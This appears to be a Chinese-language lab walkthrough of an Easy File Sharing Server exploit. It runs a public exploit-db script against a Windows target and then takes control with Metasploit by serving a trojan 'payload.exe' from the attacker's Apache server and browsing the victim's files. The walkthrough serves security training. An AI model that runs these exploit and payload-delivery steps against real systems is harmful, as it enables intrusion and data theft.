漏洞复现：easy file sharing server漏洞与Metasploit应用

一、漏洞渗透测试

1、靶机(Windows)安装easy file sharing server，该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

3、利用该漏洞，使得靶机运行计算器。

一、打开easy file sharing server

 二、kali上nmap扫描端口

 发现80和443端口提供该服务

扫描漏洞

 运行脚本

python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机ip 80

 之后靶机会启动计算器，easy file sharing server 关闭，漏洞复现成功。

二、Metasploit应用

1、生成主控端、被控端。

2、获得靶机(Windows)控制权。

3、下载靶机上任意一个文件。

一、生成被控端

生成一个木马文件

 启动apache服务，使得靶机能够下载木马文件

service apache2 start

将木马文件上传到服务器上

cp payload.exe /var/www/html/payload.exe

 之后靶机要下载该文件

浏览器输入攻击机ip/payload.exe

 打开msfconsole

设置参数

 之后只要靶机打开了木马文件，就可以控制靶机了

 如图就已经控制成功了

我们可以查看靶机的文件

 如果不再控制靶机，输入

如果不再要控制靶机，输入

exit -y

即可退出控制

本栏目推荐文章
• SQL Server 检测是不是数字型数据的两种方法
• shared_ptr 循环引用以及解决办法
• SQL Server 高性能写入的一些总结
• OFBiz RCE漏洞复现（CVE-2023-51467）
• A connection was successfully established with the server but then an error
• SQL SERVER日期时间转字符串
• Windows Server 2016 & 2019 工作站速配脚本
• sql server 保留2位小数
• vscode错误：Unable to connect to VS Code server: Error in request.
• TURN SERVER vs. ICE SERVER

漏洞 Metasploit sharing server easy漏洞metasploit sharing server 漏洞sharing server easy 漏洞 安全漏洞oracle server server_file漏洞 服务器 目录 漏洞oracle server mysql 安全漏洞 漏洞oracle server 路径 漏洞apache server 漏洞mod_proxy apache server metasploit metasploit框架